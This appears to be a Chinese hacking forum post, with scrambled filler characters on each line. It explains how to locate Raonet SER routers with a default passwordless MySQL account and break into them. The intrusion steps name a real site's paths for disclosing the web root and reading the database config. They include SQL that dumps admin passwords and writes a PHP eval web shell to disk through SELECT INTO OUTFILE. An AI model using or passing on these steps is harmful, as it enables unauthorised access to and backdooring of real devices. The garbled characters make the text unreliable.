寻找存在漏洞的路由器方法:) w9 X: d4 v) c2 k9 l: [7 z
; o" Q7 g3 e- e( A% l( p* U1:google搜索'Raonet Subscriber Ethernet Router'5 m; E$ S% p' ~* x7 H( _
8 ~' l. A9 _1 c2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* I j0 x3 p+ T$ x8 q P3 g& t4 E* K r# W
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。6 f* f- Y# p8 k) @
8 P6 C; ~2 z- N8 R" |$ F/ E3 n4 i
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成....../ D3 S: O( d7 p% L% S3 K: w
9 O) }" N: H- X: `6 m8 J1 {
& E: q4 B4 y; X
/ d+ j& P4 F0 ]$ V入侵步骤:: i1 d+ |0 x- A; R* U8 t% w
: a& N3 z2 P, Z' R% v: W
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php' d8 @" c7 Y! r+ |8 k& W5 ^+ E
8 L8 T$ v2 r& u3 G8 |2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
6 R5 G1 Z7 B& B( V/ H- t" `3:得到密码后连接,查看GUI管理密码:
3 X& P9 `+ \; D/ `2 j% P: }use ser_500
' C. w4 K8 m% w) j5 W6 V1 ^0 H3 c, Nselect id,passwd from user; n/ A' s5 [ S6 M- I
4:通过数据库写入webshell,执行命令:6 a# U+ R7 ~ o0 j, u$ r5 r
use mysql;
4 ~3 [0 b, |( d. D& `create table ok(cmd TEXT);
+ b+ L4 C' n' m( V/ }insert into ok values("<?php @eval($_POST[cmd])?>");1 S; O1 W) y8 C, U
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
) ]3 A" c! |7 c" d& c) ~2 s2 Q c9 u6 odrop table ok;
! \8 z3 ]& J: s! Z
4 R; J3 l8 b l/ r5:连接后门shell.php
- w) x5 S' U1 i1 x9 Y
2 x8 V# M c1 F+ H5 a% ^4 I7 N, q- E' e6. 搞定!. L" ~. A0 m) } U+ d7 `9 I
0 A* ]2 J) B4 _2 Q5 |+ S |